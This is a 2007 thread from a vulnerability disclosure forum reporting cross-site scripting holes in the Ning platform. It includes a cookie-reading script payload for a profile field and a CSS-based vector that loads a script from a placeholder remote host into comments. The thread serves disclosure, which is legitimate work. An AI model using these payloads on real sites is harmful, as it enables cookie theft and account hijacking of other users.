Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Ning XSS hole
Posted by: Delixe
Date: November 09, 2007 01:08AM

PoC -> http://opensocialdemo.ning.com/profile/Suhail

Image:


My Profile -> Account -> City

It's vulnerable in the City field with the vector "><script>alert(document.cookie);</script>

Ning is supposed to be closing it in the next round of patches I believe.



Edited 4 time(s). Last edit at 11/09/2007 01:31AM by Delixe.

Options: ReplyQuote
Re: Ning XSS hole
Posted by: hackathology
Date: November 18, 2007 06:50AM

nice find

http://hackathology.blogspot.com

Options: ReplyQuote
Re: Ning XSS hole
Posted by: DoctorDan
Date: December 09, 2007 02:34PM

That entire site is absolutely riddled with XSS holes. Any place that allows styled user input (blogs, comments, etc.) allows expression() and -moz-binding.
This vector is what I came up with for comments (Mozilla and IE)...
<a style="x:expression(document.body.firstChild.nextSibling.setAttribute('src','http://yoursite.com/XSS.js'));-moz-binding:url('http://yoursite.com/XSS.xml#xss')"></a>

-Dan



Edited 1 time(s). Last edit at 12/09/2007 02:34PM by DoctorDan.

Options: ReplyQuote
Re: Ning XSS hole
Posted by: maluc
Date: December 22, 2007 07:40AM

a fun exercise in why partial censoring can be dangerous..

spacing comparison can likely uncover more, but i haven't the patience for that ^^

New Image:


-maluc

Options: ReplyQuote


Sorry, only registered users may post in this forum.